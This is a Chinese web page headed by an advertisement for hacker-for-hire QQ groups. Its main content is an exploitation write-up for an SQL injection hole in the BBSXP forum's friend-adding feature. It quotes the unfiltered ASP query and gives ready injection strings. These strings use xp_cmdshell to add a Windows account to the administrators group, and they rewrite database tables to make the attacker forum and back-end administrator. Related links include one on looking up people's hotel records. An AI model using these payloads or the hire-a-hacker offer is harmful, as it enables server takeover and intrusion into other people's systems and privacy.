24小时接单的黑客qq群 先办事后付款的黑客qq

访客3年前关于黑客接单518

漏洞描述:   相信大家都听过bbsxp吧,它是一款网上流行的论坛程序,我就不多作介绍了。这次我检测的是它的sql版,没过多久果然就发现了问题了  我们利用它可以掌握整个论坛的生杀大权,如果管理员sql服务器配置不当的话,甚至可以攻占整个服务器。 ............................................................................................................. 漏洞分析: 这个漏洞主要出在friend.asp这个文件,让我们来看一下有问题的部分源码,下面是用户添加好友的程序:   sub add if Request("username")="" then error2("请输入您要添加的好友名字!") end if if Request("username")=Request.Cookies("username") then error2("不能添加自己!") end if if conn.execute("Select count(id)from [user] where username='"&Request("username")&"'")(0)=0 then error2("数据库不存在此用户的资料!") end if  只要求好友的名字不为空和不能添加自己,并没有过滤特殊符号,其实这个不能添加自己的限制也是能绕过的,不过也没什么用 :)。 ..................................................................................................................... 利用 *** :  注册随便注册一个用户,这里我注册的是pinkeyes,好,转到个人控制面板,添加一个论坛存在的人为好友,这里我选的人是king, 选择添加好友按钮,这时会弹出一个输入框,在里面输入: king' ;exec master.dbo.xp_cmdshell 'net user pinkeyes pinkeyes /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- 添加了一个名为pinkeyes,密码为pinkeyes的账户。 ..................................................................................................................... 再来: king' ;exec master.dbo.xp_cmdshell 'net localgroup administrators pinkeyes /add';--      把pinkeyes加到管理员用户组中。下面的事就不用我说了吧! 注意:如果连接数据库的账号没有权限的话或管理员删除了master.dbo.xp_cmdshell这个存储过程的话是不会成功.但是你可以对这个数据库做 任何事。 ..........................................................................................................................   如果不能添加账户也没关系,也阻挡不了我前进的步伐。好,下面我来讲一下利用 *** : 仍然是添加好友,输入: king' ;update [user] set membercode=5,levelname='社区区长' where username='pinkeyes' -- 把pinkeyes提升为社区区长,前台工作。 再来输入: king';update clubconfig set administrators='│pinkeyes│',adminpassword='pinkeyes' -- 把后台管理员设为pinkeyes,密码也为pinkeyes ok,现在你是管理员了,要干什么就干什么吧! 

相关文章

训狗之狗狗能力培训程序(狗的能力培养分为几

训狗之狗狗能力培训程序(狗的能力培养分为几

狗的每一种完整能力的养成,都是按一定的程序进行训练的。这种程序必须符台先易后难、由简人繁,循序渐进的客观规律。一般来说,狗的能力的培养程序分为三个阶段: 第一阶段,是培养狗对口令建立基本条件反射的阶...

怎么查个人开宾馆记录_免费查开宾馆记录查询

如何查询本人开宾馆记录_完全免费查开宾馆查询记录 实际上,各家酒店餐厅的收费周期时间是不一样的。一些酒店餐厅从搬入时刚开始,24小时内退房流程是一天。大部分酒店餐厅选用国际性测算。 从...

基努里维斯的作品排名,海南有没有黑客联系,广州现实黑客那里找

+ 0ms: Channel 61,我了解的应急呼应是对突发的不知道的安全事情进行应急呼应处理。 这种状况一般都是“被黑”了。 “被黑”包含很多种:服务器被侵略,事务呈现蠕虫事情,用户以及公司员工被垂...

关门山枫叶什么时候红?告诉你最佳赏枫叶的时

关门山枫叶什么时候红?告诉你最佳赏枫叶的时

一年四季,春夏秋冬,四个不同的季节映衬着不同的美景。 春天的苏醒,夏天的清凉,秋天的滋润,冬天的寒雪。 对于四季都有不同喜欢的理由,而我更加中意淡淡的秋季。 图/文:墨香丶诗韵 图/文...

手机刷机有什么好处(会有坏处吗)

手机刷机有什么好处(会有坏处吗)

我们在生活中肯定都给手机刷过机,大多是拿到专门的手机门店进行这个操作,其实自己也可以完成的。今天,小编就来告诉大家,手机刷机怎么刷?刷机究竟能解决哪些问题?现在就来学习一下吧! 手机刷机怎么刷:...

文件包含漏洞防护以及常见的文件读取payload

前言:与许多漏洞利用一样,文件包含漏洞是一种很常见的漏洞。本文将给您一个保护您的网站的范例,文末会提供一些文件读取的常见payload。本文将以PHP格式提供代码示例。一、安全示例现在请看下面的代码&...